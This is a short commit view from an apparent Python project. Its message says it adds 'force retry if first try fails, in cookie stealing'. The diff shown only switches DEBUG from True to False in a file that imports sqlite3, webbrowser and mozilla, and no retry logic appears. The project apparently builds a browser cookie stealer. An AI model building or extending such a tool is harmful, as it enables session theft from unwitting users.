add force retry if first try fails, in cookie stealing
This commit is contained in:
@@ -11,7 +11,7 @@ import sqlite3
|
||||
import webbrowser
|
||||
import mozilla
|
||||
|
||||
DEBUG = True
|
||||
DEBUG = False
|
||||
number = ['0','1','2','3','4','5','6','7','8','9']
|
||||
|
||||
|
||||
|
||||
Reference in New Issue
Block a user